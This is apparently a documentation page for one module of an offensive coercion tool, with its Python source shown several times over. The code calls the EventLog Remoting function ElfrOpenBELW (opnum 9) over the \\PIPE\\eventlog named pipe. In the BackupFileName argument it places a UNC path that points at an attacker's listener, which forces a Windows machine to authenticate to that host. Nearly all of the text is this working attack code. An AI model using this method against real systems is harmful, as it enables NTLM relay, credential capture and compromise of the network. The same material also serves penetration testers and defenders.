coercer.methods.MS_EVEN.ElfrOpenBELW

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : ElfrOpenBELW.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 11 Dec 2022
 6
 7
 8import random
 9from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
10from coercer.network.DCERPCSessionError import DCERPCSessionError
11from impacket.dcerpc.v5 import even
12from impacket.dcerpc.v5.dtypes import NULL
13
14
class ElfrOpenBELW(MSPROTOCOLRPCCALL):
    """
    Coerce a machine into authenticating through function [ElfrOpenBELW](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) (opnum 9) of [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f).

    The BackupFileName argument carries a UNC path pointing at the listener.

    Method found by:
     - [@evilashz](https://github.com/evilashz/)
    """

    # Path templates; the framework expands the {{...}} placeholders into
    # self.path before trigger() is called.
    exploit_paths = [
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa'),
    ]

    # Transports over which the MS-EVEN interface is reached: the
    # \PIPE\eventlog named pipe and raw TCP, both bound to the same interface
    # UUID. These are the values to use when auditing RPC access to the
    # EventLog service.
    # NOTE(review): the key is spelled "ncan_np" (not "ncacn_np"); presumably
    # looked up by this exact spelling elsewhere in the framework, so it is
    # kept verbatim -- confirm before renaming.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\eventlog",
                "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
                "version": "0.0",
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
                "version": "0.0",
            },
        ],
    }

    protocol = {
        "longname": "[MS-EVEN]: EventLog Remoting Protocol",
        "shortname": "MS-EVEN",
    }

    # The argument that receives the UNC path is BackupFileName.
    function = {
        "name": "ElfrOpenBELW",
        "opnum": 9,
        "vulnerable_arguments": ["BackupFileName"],
    }

    def trigger(self, dcerpc_session, target):
        """
        Issue a single ElfrOpenBELW call over an already-bound DCE/RPC session.

        Args:
            dcerpc_session: bound session object exposing ``request()``;
                None means connect() was never called.
            target: accepted for interface compatibility; not read here.

        Returns:
            "" when the call completed, the caught exception object when it
            did not, or None when no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            # Strip trailing NUL padding; this rewrites self.path in place.
            cleaned_path = self.path.rstrip('\x00')
            self.path = cleaned_path
            req = even.ElfrOpenBELW()
            req['UNCServerName'] = NULL
            req['BackupFileName'] = cleaned_path
            # Version fields are randomised on every call, so they are not a
            # stable value to match on; the opnum and pipe name are.
            req['MajorVersion'] = random.randint(0, 100)
            req['MinorVersion'] = random.randint(0, 100)
            reply = dcerpc_session.request(req)
            reply.dump()
            return ""
        except Exception as exc:
            # Any failure is handed back to the caller instead of raised.
            return exc
class ElfrOpenBELW(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
class ElfrOpenBELW(MSPROTOCOLRPCCALL):
    """
    Coerce a machine into authenticating through function [ElfrOpenBELW](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) (opnum 9) of [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f).

    The BackupFileName argument carries a UNC path pointing at the listener.

    Method found by:
     - [@evilashz](https://github.com/evilashz/)
    """

    # Path templates; the framework expands the {{...}} placeholders into
    # self.path before trigger() is called.
    exploit_paths = [
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa'),
    ]

    # Transports over which the MS-EVEN interface is reached: the
    # \PIPE\eventlog named pipe and raw TCP, both bound to the same interface
    # UUID. These are the values to use when auditing RPC access to the
    # EventLog service.
    # NOTE(review): the key is spelled "ncan_np" (not "ncacn_np"); presumably
    # looked up by this exact spelling elsewhere in the framework, so it is
    # kept verbatim -- confirm before renaming.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\eventlog",
                "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
                "version": "0.0",
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
                "version": "0.0",
            },
        ],
    }

    protocol = {
        "longname": "[MS-EVEN]: EventLog Remoting Protocol",
        "shortname": "MS-EVEN",
    }

    # The argument that receives the UNC path is BackupFileName.
    function = {
        "name": "ElfrOpenBELW",
        "opnum": 9,
        "vulnerable_arguments": ["BackupFileName"],
    }

    def trigger(self, dcerpc_session, target):
        """
        Issue a single ElfrOpenBELW call over an already-bound DCE/RPC session.

        Args:
            dcerpc_session: bound session object exposing ``request()``;
                None means connect() was never called.
            target: accepted for interface compatibility; not read here.

        Returns:
            "" when the call completed, the caught exception object when it
            did not, or None when no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            # Strip trailing NUL padding; this rewrites self.path in place.
            cleaned_path = self.path.rstrip('\x00')
            self.path = cleaned_path
            req = even.ElfrOpenBELW()
            req['UNCServerName'] = NULL
            req['BackupFileName'] = cleaned_path
            # Version fields are randomised on every call, so they are not a
            # stable value to match on; the opnum and pipe name are.
            req['MajorVersion'] = random.randint(0, 100)
            req['MinorVersion'] = random.randint(0, 100)
            reply = dcerpc_session.request(req)
            reply.dump()
            return ""
        except Exception as exc:
            # Any failure is handed back to the caller instead of raised.
            return exc

Coercing a machine to authenticate using function ElfrOpenBELW (opnum 9) of MS-EVEN: EventLog Remoting Protocol

Method found by:

exploit_paths = [('smb', '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\eventlog', 'uuid': '82273fdc-e32a-18c3-3f78-827929dc23ea', 'version': '0.0'}], 'ncacn_ip_tcp': [{'uuid': '82273fdc-e32a-18c3-3f78-827929dc23ea', 'version': '0.0'}]}
protocol = {'longname': '[MS-EVEN]: EventLog Remoting Protocol', 'shortname': 'MS-EVEN'}
function = {'name': 'ElfrOpenBELW', 'opnum': 9, 'vulnerable_arguments': ['BackupFileName']}
def trigger(self, dcerpc_session, target):
    def trigger(self, dcerpc_session, target):
        """
        Issue a single ElfrOpenBELW call over an already-bound DCE/RPC session.

        Args:
            dcerpc_session: bound session object exposing ``request()``;
                None means connect() was never called.
            target: accepted for interface compatibility; not read here.

        Returns:
            "" when the call completed, the caught exception object when it
            did not, or None when no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            # Strip trailing NUL padding; this rewrites self.path in place.
            cleaned_path = self.path.rstrip('\x00')
            self.path = cleaned_path
            req = even.ElfrOpenBELW()
            req['UNCServerName'] = NULL
            req['BackupFileName'] = cleaned_path
            # Version fields are randomised on every call, so they are not a
            # stable value to match on; the opnum and pipe name are.
            req['MajorVersion'] = random.randint(0, 100)
            req['MinorVersion'] = random.randint(0, 100)
            reply = dcerpc_session.request(req)
            reply.dump()
            return ""
        except Exception as exc:
            # Any failure is handed back to the caller instead of raised.
            return exc